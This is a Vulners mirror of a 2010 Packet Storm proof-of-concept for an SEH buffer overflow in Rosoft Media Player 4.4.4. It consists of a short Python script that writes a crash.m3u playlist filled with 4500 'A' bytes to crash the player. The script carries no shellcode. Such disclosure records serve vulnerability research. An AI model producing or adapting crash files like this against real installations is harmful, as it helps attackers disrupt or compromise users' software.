Lucene search
K

Rosoft Media Player 4.4.4 Buffer Overflow

🗓️ 12 Aug 2010 00:00:00Reported by Abhishek LyallType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Rosoft Media Player 4.4.4 Buffer Overflow vulnerability exploi

Code
`#rosoft media player 4.4.4 SEH buffer overflow POC  
#vulnerble application link http://download.cnet.com/Rosoft-Media-Player/3000-2139_4-10044022.html  
#tested on XP SP2  
#author abhishek lyall - abhilyall[at]gmail[dot]com  
#web - http://www.aslitsecurity.com/  
#blog - http://www.aslitsecurity.blogspot.com/  
#!/usr/bin/python  
  
filename = "crash.m3u"  
  
  
junk = "\x41" * 4500  
  
textfile = open(filename , 'w')  
textfile.write(junk)  
textfile.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation